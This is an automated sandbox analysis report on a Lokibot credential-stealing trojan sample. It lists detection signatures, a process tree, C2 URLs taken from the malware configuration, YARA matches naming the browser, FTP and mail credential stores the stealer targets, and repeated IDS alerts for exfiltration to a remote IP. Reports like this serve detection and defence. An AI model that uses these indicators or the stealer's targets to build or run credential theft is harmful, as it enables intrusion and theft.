Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
kVijllv0Yl

Overview

General Information

Sample Name:kVijllv0Yl (renamed file extension from none to exe)
Analysis ID:562515
MD5:6997de404fb7e798aecc2c8a14fd2f12
SHA1:121a437542ba544f975847429dda439719800bb9
SHA256:f36a543cfcddf76b99df925bf70b22d560792d1059387e00bfe782bffd6e8a2b
Tags:32exeLokitrojan
Infos:

Detection

Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Lokibot
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Yara detected aPLib compressed binary
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file registry)
Machine Learning detection for sample
Injects a PE file into a foreign processes
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Enables debug privileges
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • kVijllv0Yl.exe (PID: 2312 cmdline: "C:\Users\user\Desktop\kVijllv0Yl.exe" MD5: 6997DE404FB7E798AECC2C8A14FD2F12)
    • kVijllv0Yl.exe (PID: 1292 cmdline: "C:\Users\user\Desktop\kVijllv0Yl.exe" MD5: 6997DE404FB7E798AECC2C8A14FD2F12)
  • cleanup

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000000.350551294.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000001.00000000.350551294.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
      00000001.00000000.350551294.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
        00000001.00000000.350551294.0000000000400000.00000040.00000400.00020000.00000000.sdmpINDICATOR_SUSPICIOUS_GENInfoStealerDetects executables containing common artifcats observed in infostealersditekSHen
        • 0x17936:$f1: FileZilla\recentservers.xml
        • 0x17976:$f2: FileZilla\sitemanager.xml
        • 0x15be6:$b2: Mozilla\Firefox\Profiles
        • 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
        • 0x15afa:$s4: logins.json
        • 0x169a4:$s6: wand.dat
        • 0x15424:$a1: username_value
        • 0x15414:$a2: password_value
        • 0x15a5f:$a3: encryptedUsername
        • 0x15acc:$a3: encryptedUsername
        • 0x15a72:$a4: encryptedPassword
        • 0x15ae0:$a4: encryptedPassword
        00000001.00000000.350551294.0000000000400000.00000040.00000400.00020000.00000000.sdmpLoki_1Loki Payloadkevoreilly
        • 0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
        • 0x153fc:$a2: last_compatible_version
        Click to see the 37 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        0.2.kVijllv0Yl.exe.1ade0000.3.unpackSUSP_XORed_URL_in_EXEDetects an XORed URL in an executableFlorian Roth
        • 0x13278:$s1: http://
        • 0x16233:$s1: http://
        • 0x16c74:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0
        • 0x13280:$s2: https://
        • 0x13278:$f1: http://
        • 0x16233:$f1: http://
        • 0x13280:$f2: https://
        0.2.kVijllv0Yl.exe.1ade0000.3.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
          0.2.kVijllv0Yl.exe.1ade0000.3.unpackLoki_1Loki Payloadkevoreilly
          • 0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
          • 0x133fc:$a2: last_compatible_version
          0.2.kVijllv0Yl.exe.1ade0000.3.unpackLokibotdetect Lokibot in memoryJPCERT/CC Incident Response Group
          • 0x123ff:$des3: 68 03 66 00 00
          • 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
          • 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
          1.0.kVijllv0Yl.exe.400000.9.unpackSUSP_XORed_URL_in_EXEDetects an XORed URL in an executableFlorian Roth
          • 0x13e78:$s1: http://
          • 0x17633:$s1: http://
          • 0x18074:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0
          • 0x13e80:$s2: https://
          • 0x13e78:$f1: http://
          • 0x17633:$f1: http://
          • 0x13e80:$f2: https://
          Click to see the 84 entries

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Found malware configuration
          Source: 00000001.00000000.346477507.0000000000400000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}
          Multi AV Scanner detection for submitted file
          Source: kVijllv0Yl.exeVirustotal: Detection: 40%Perma Link
          Source: kVijllv0Yl.exeReversingLabs: Detection: 47%
          Antivirus detection for URL or domain
          Source: http://secure01-redirect.net/gc15/fre.phpAvira URL Cloud: Label: malware
          Multi AV Scanner detection for domain / URL
          Source: secure01-redirect.netVirustotal: Detection: 21%Perma Link
          Source: http://secure01-redirect.net/gc15/fre.phpVirustotal: Detection: 19%Perma Link
          Multi AV Scanner detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\nsg69F4.tmp\xfmkprutvpn.dllVirustotal: Detection: 27%Perma Link
          Machine Learning detection for sample
          Source: kVijllv0Yl.exeJoe Sandbox ML: detected
          Source: 1.0.kVijllv0Yl.exe.400000.3.unpackAvira: Label: TR/Patched.Ren.Gen2
          Source: 1.0.kVijllv0Yl.exe.400000.1.unpackAvira: Label: TR/Patched.Ren.Gen2
          Source: 1.0.kVijllv0Yl.exe.400000.0.unpackAvira: Label: TR/Patched.Ren.Gen2
          Source: 1.0.kVijllv0Yl.exe.400000.2.unpackAvira: Label: TR/Patched.Ren.Gen2
          Source: kVijllv0Yl.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: Binary string: wntdll.pdbUGP source: kVijllv0Yl.exe, 00000000.00000003.343540799.000000001AE20000.00000004.00000800.00020000.00000000.sdmp, kVijllv0Yl.exe, 00000000.00000003.341251965.000000001AFB0000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: kVijllv0Yl.exe, 00000000.00000003.343540799.000000001AE20000.00000004.00000800.00020000.00000000.sdmp, kVijllv0Yl.exe, 00000000.00000003.341251965.000000001AFB0000.00000004.00000800.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeCode function: 0_2_00405D7C FindFirstFileA,FindClose,0_2_00405D7C
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeCode function: 0_2_004053AA CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_004053AA
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeCode function: 0_2_00402630 FindFirstFileA,0_2_00402630
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeCode function: 1_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,1_2_00403D74

          Networking

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
          Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.6:49769 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49769 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49769 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.6:49769 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.6:49770 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49770 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49770 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.6:49770 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49771 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49771 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49771 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49771 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.185.69.76:80 -> 192.168.2.6:49771
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49773 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49773 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49773 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49773 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.185.69.76:80 -> 192.168.2.6:49773
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49774 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49774 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49774 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49774 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.185.69.76:80 -> 192.168.2.6:49774
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49775 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49775 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49775 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49775 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.185.69.76:80 -> 192.168.2.6:49775
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49776 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49776 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49776 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49776 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.185.69.76:80 -> 192.168.2.6:49776
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49779 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49779 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49779 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49779 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.185.69.76:80 -> 192.168.2.6:49779
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49780 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49780 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49780 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49780 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.185.69.76:80 -> 192.168.2.6:49780
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49782 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49782 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49782 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49782 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.185.69.76:80 -> 192.168.2.6:49782
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49783 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49783 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49783 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49783 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.185.69.76:80 -> 192.168.2.6:49783
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49784 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49784 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49784 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49784 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.185.69.76:80 -> 192.168.2.6:49784
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49787 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49787 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49787 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49787 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.185.69.76:80 -> 192.168.2.6:49787
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49793 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49793 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49793 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49793 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.185.69.76:80 -> 192.168.2.6:49793
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49795 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49795 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49795 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49795 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.185.69.76:80 -> 192.168.2.6:49795
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49797 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49797 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49797 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49797 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.185.69.76:80 -> 192.168.2.6:49797
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49802 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49802 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49802 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49802 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.185.69.76:80 -> 192.168.2.6:49802
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49818 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49818 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49818 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49818 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.185.69.76:80 -> 192.168.2.6:49818
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49830 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49830 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49830 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49830 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.185.69.76:80 -> 192.168.2.6:49830
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49840 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49840 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49840 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49840 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.185.69.76:80 -> 192.168.2.6:49840
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49841 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49841 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49841 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49841 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.185.69.76:80 -> 192.168.2.6:49841
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49842 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49842 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49842 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49842 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.185.69.76:80 -> 192.168.2.6:49842
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49845 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49845 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49845 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49845 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.185.69.76:80 -> 192.168.2.6:49845
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49850 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49850 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49850 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49850 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.185.69.76:80 -> 192.168.2.6:49850
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49851 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49851 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49851 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49851 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.185.69.76:80 -> 192.168.2.6:49851
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49852 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49852 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49852 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49852 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.185.69.76:80 -> 192.168.2.6:49852
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49854 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49854 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49854 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49854 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.185.69.76:80 -> 192.168.2.6:49854
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49855 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49855 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49855 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49855 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.185.69.76:80 -> 192.168.2.6:49855
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49862 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49862 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49862 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49862 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.185.69.76:80 -> 192.168.2.6:49862
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49870 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49870 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49870 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49870 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.185.69.76:80 -> 192.168.2.6:49870
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49881 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49881 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49881 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49881 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.185.69.76:80 -> 192.168.2.6:49881
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49882 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49882 -> 185.185.69.76:80
